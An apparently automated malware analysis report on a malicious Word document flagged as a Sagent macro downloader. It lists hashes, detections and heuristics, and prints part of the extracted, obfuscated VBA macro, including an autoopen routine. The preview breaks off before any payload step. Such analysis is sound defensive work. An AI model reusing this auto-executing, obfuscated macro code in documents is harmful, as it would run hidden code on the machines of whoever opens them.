Office (OLE) malware analysis — malicious · 2ea0e26084bc2c5a

MALICIOUS

Office (OLE)

166.2 KB Created: 2019-04-05 19:59:00 Authoring application: Microsoft Office Word First seen: 2019-04-21

MD5: 659959921c61d5ca9f4e43b2cfd4c7d1 SHA-1: db95b66f3a5c38855b136c2fb602c37d1a2b2dff SHA-256: 2ea0e26084bc2c5abcdc83efc8dd5f1071f44e7975c79e125cd441b314bfdac5

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1059 Command and Scripting Interpreter

The file is identified as malicious by ClamAV and exhibits high-severity heuristics indicating the presence of an AutoOpen VBA macro that uses GetObject for execution. The VBA macro code is heavily obfuscated but its structure and the presence of execution-related heuristics suggest it is designed to download and execute a secondary payload. The document's metadata indicates it was authored by Microsoft Office Word, and the presence of VBA macros points to a macro-based attack vector.

Heuristics 7

ClamAV: Doc.Malware.Sagent-6932497-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Sagent-6932497-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 35843 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	35843 bytes
SHA-256: `323682ee3ae0b2b1cd78aa0a85c91f4cea6d7b7f0a48dedf7e8dad061f610acb`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "FAABDADA" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "hZUoXUcA" Attribute VB_Base = "0{0044E13D-6B39-4E0E-8329-458B160CB026}{704E36E8-FD0D-413C-BF71-B2E93F29FB33}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "qZAQCAo" Attribute VB_Base = "0{011C69D3-5269-45E0-B02C-1420E620B63B}{62E10972-9CE7-472C-9CD1-42AE75DFAC16}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "VcAwAXA" Function HADBC_() If 442254873 = 499686504 Then b_C_cD = 557832723 + Hex(LA4ADQA) + 538712391 / NAcAcA * (QG1DwQAG * CSng(61118027 / CByte(pUAUwUQU)) - zo4AAAAQ - Sqr(QBXwA1BD / 73938180 + 144019114 + CDate(VABQAXQ4 - Sgn(201613861) + wAAUAAXU * 146645847))) + (891176315 + 61339754 + 484509555 * KoCBUA) End If If 316993078 = 507198048 Then bBDDAA = 636959852 + Hex(FQABoQ) + 289853246 / GAcDUAGA * (MAQk_A * CSng(258629473 / CByte(VZAAXU)) - lDCBwQ4 - Sqr(QA_CGGAQ / 434076849 + 729545492 + CDate(uAAAwow - Sgn(97153239) + VAoCAQwx * 913110675))) + (167757396 + 748495757 + 640735135 * wAABoDQC) End If If 851913475 = 903381327 Then qCQcCDD = 586780513 + Hex(CA4DAXA) + 117818655 / BUBcx4cX * (FBAoA4C * CSng(478473590 / CByte(p4QkAAA)) - GBAZQA - Sqr(oCADAA / 461366938 + 436412164 + CDate(mAXwBA - Sgn(45513629) + zAB1BDo * 209613792))) + (654083735 + 373494509 + 334400110 * L_AZAA) End If End Function Sub autoopen() tkAAB4D_ End Sub Function Yo_QQA() If 274942884 = 17039148 Then dGA_AoX = 361563368 + Hex(ZABAG_Z) + 483864198 / KZwQBD * (zXDk1BDZ * CSng(197868115 / CByte(MACAU1)) - iUcCQAZA - Sqr(K4c_AAA / 273878866 + 374207182 + CDate(mA1cXk_A - Sgn(766582653) + n4ADcA * 587690647))) + (466297411 + 802991783 + 695342327 * zoAQXQ) End If If 137002513 = 546200468 Then TGAZQQ = 529831822 + Hex(YABDAwQ) + 611028127 / PACBQAQB * (uBUAUk_ * CSng(204333742 / CByte(oUAXxo)) - CABA_B - Sqr(WADBxwDA / 654082578 + 906315897 + CDate(TAAABBA4 - Sgn(689515842) + jQAZAA_k * 563115738))) + (98684719 + 969116289 + 673525409 * uABDUQkB) End If If 458352785 = 885888611 Then kQXUA_AA = 737674241 + Hex(W__CcA) + 68097222 / KcAQ4_ * (pwBUX4 * CSng(619921805 / CByte(GZcA1k)) - Q_AAkQU - Sqr(dUAAAUA / 40213486 + 520610438 + CDate(wwoBAA - Sgn(764491278) + HABxX1c * 232653729))) + (688426948 + 674333135 + 439441484 * kxAAAA) End If End Function Attribute VB_Name = "FxBwUC4Q" Function OAcBDAA_() If 988491044 = 553866613 Then c1cD1A = 127125920 + Hex(D_1AAA) + 213181095 / wAUQcXCD * (jBUAcxDD * CSng(574265294 / CByte(MAAA_QA)) - XCxD4X4Q - Sqr(HXAA_wDA / 315555780 + 138702418 + CDate(h1ZUQG_Q - Sgn(669613157) + dDAAABQU * 577118532))) + (74478579 + 801686305 + 896028479 * zBDDXCcU) End If If 650451380 = 278278148 Then WBBkcA = 541609089 + Hex(wABAQAcQ) + 905932752 / LDQ_GAD * (fAAAxcA * CSng(580416402 / CByte(fAAAZAZD)) - joAAkAA - Sqr(WAA_QXA / 761349395 + 317246653 + CDate(pA1kAUQA - Sgn(285815372) + dB_AUA * 810258521))) + (120063079 + 226902755 + 652279142 * qAAAAB) End If If 963336529 = 380138346 Then l1AAXkGA = 289588896 + Hex(fAxoAwQA) + 649286081 / TBX_woQ * (dAXUkB * CSng(847862891 / CByte(ZQAAZAo)) - z_XABB - Sqr(JUAAQxB1 / 145973512 + 846648216 + CDate(nBUQ_Ao - Sgn(870063914) + B41BAAB * 237451039))) + (178705871 + 636963956 + 162988368 * HwGUZAA) End If End Function Function tkAAB4D_() On Error Resume Next If 260739108 = 553494848 Then TA_kBU = 490469089 + Hex(BA1o_x1) + 555606718 / SkAADA * (AXDoCA * CSng(419488025 / CByte(JAw1xDBZ)) - ... (truncated)

SHA-256: 323682ee3ae0b2b1cd78aa0a85c91f4cea6d7b7f0a48dedf7e8dad061f610acb

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "FAABDADA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "hZUoXUcA"
Attribute VB_Base = "0{0044E13D-6B39-4E0E-8329-458B160CB026}{704E36E8-FD0D-413C-BF71-B2E93F29FB33}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "qZAQCAo"
Attribute VB_Base = "0{011C69D3-5269-45E0-B02C-1420E620B63B}{62E10972-9CE7-472C-9CD1-42AE75DFAC16}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "VcAwAXA"
Function HADBC_()
   If 442254873 = 499686504 Then
      b_C_cD = 557832723 + Hex(LA4ADQA) + 538712391 / NAcAcA * (QG1DwQAG * CSng(61118027 / CByte(pUAUwUQU)) - zo4AAAAQ - Sqr(QBXwA1BD / 73938180 + 144019114 + CDate(VABQAXQ4 - Sgn(201613861) + wAAUAAXU * 146645847))) + (891176315 + 61339754 + 484509555 * KoCBUA)
End If
   If 316993078 = 507198048 Then
      bBDDAA = 636959852 + Hex(FQABoQ) + 289853246 / GAcDUAGA * (MAQk_A * CSng(258629473 / CByte(VZAAXU)) - lDCBwQ4 - Sqr(QA_CGGAQ / 434076849 + 729545492 + CDate(uAAAwow - Sgn(97153239) + VAoCAQwx * 913110675))) + (167757396 + 748495757 + 640735135 * wAABoDQC)
End If
   If 851913475 = 903381327 Then
      qCQcCDD = 586780513 + Hex(CA4DAXA) + 117818655 / BUBcx4cX * (FBAoA4C * CSng(478473590 / CByte(p4QkAAA)) - GBAZQA - Sqr(oCADAA / 461366938 + 436412164 + CDate(mAXwBA - Sgn(45513629) + zAB1BDo * 209613792))) + (654083735 + 373494509 + 334400110 * L_AZAA)
End If
End Function
Sub autoopen()
tkAAB4D_
End Sub
Function Yo_QQA()
   If 274942884 = 17039148 Then
      dGA_AoX = 361563368 + Hex(ZABAG_Z) + 483864198 / KZwQBD * (zXDk1BDZ * CSng(197868115 / CByte(MACAU1)) - iUcCQAZA - Sqr(K4c_AAA / 273878866 + 374207182 + CDate(mA1cXk_A - Sgn(766582653) + n4ADcA * 587690647))) + (466297411 + 802991783 + 695342327 * zoAQXQ)
End If
   If 137002513 = 546200468 Then
      TGAZQQ = 529831822 + Hex(YABDAwQ) + 611028127 / PACBQAQB * (uBUAUk_ * CSng(204333742 / CByte(oUAXxo)) - CABA_B - Sqr(WADBxwDA / 654082578 + 906315897 + CDate(TAAABBA4 - Sgn(689515842) + jQAZAA_k * 563115738))) + (98684719 + 969116289 + 673525409 * uABDUQkB)
End If
   If 458352785 = 885888611 Then
      kQXUA_AA = 737674241 + Hex(W__CcA) + 68097222 / KcAQ4_ * (pwBUX4 * CSng(619921805 / CByte(GZcA1k)) - Q_AAkQU - Sqr(dUAAAUA / 40213486 + 520610438 + CDate(wwoBAA - Sgn(764491278) + HABxX1c * 232653729))) + (688426948 + 674333135 + 439441484 * kxAAAA)
End If
End Function

Attribute VB_Name = "FxBwUC4Q"
Function OAcBDAA_()
   If 988491044 = 553866613 Then
      c1cD1A = 127125920 + Hex(D_1AAA) + 213181095 / wAUQcXCD * (jBUAcxDD * CSng(574265294 / CByte(MAAA_QA)) - XCxD4X4Q - Sqr(HXAA_wDA / 315555780 + 138702418 + CDate(h1ZUQG_Q - Sgn(669613157) + dDAAABQU * 577118532))) + (74478579 + 801686305 + 896028479 * zBDDXCcU)
End If
   If 650451380 = 278278148 Then
      WBBkcA = 541609089 + Hex(wABAQAcQ) + 905932752 / LDQ_GAD * (fAAAxcA * CSng(580416402 / CByte(fAAAZAZD)) - joAAkAA - Sqr(WAA_QXA / 761349395 + 317246653 + CDate(pA1kAUQA - Sgn(285815372) + dB_AUA * 810258521))) + (120063079 + 226902755 + 652279142 * qAAAAB)
End If
   If 963336529 = 380138346 Then
      l1AAXkGA = 289588896 + Hex(fAxoAwQA) + 649286081 / TBX_woQ * (dAXUkB * CSng(847862891 / CByte(ZQAAZAo)) - z_XABB - Sqr(JUAAQxB1 / 145973512 + 846648216 + CDate(nBUQ_Ao - Sgn(870063914) + B41BAAB * 237451039))) + (178705871 + 636963956 + 162988368 * HwGUZAA)
End If
End Function
Function tkAAB4D_()
On Error Resume Next
   If 260739108 = 553494848 Then
      TA_kBU = 490469089 + Hex(BA1o_x1) + 555606718 / SkAADA * (AXDoCA * CSng(419488025 / CByte(JAw1xDBZ)) -
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.